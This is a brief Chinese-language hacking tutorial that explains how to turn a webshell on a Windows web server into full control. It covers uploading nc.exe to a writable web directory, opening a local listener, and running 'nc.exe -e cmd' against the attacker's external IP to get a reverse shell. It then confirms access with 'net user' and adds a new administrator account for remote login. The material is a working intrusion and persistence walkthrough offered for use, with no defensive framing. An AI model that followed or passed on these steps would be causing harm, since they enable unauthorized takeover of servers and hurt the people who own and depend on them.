Server-U等都不可以用的情况下. 一般都可思考用此方法
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….
1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去
data:image/s3,"s3://crabby-images/7add0/7add09edf6a4e68a49109182c11d57debac2ec4f" alt=""
2:然后本地执行nc -vv -lp 52进行反弹
data:image/s3,"s3://crabby-images/1f8d7/1f8d722fb978b5c211e52a672add3352b3e2c6b1" alt=""
3:在shell命令下执行
F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)
data:image/s3,"s3://crabby-images/56098/56098d18162635f308d23dc7027b7ec55d796acf" alt=""
4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.
data:image/s3,"s3://crabby-images/972ca/972cab7e0d7a50f3ad6e0bf448970d94702d59f7" alt=""
5:直接添加用户,然后远程去连接!
data:image/s3,"s3://crabby-images/36036/360361bf64a2d331325da089ab2c03b237edb285" alt=""
看到添加成功,也设置为管理组了!接下来直接远程连接就OK! |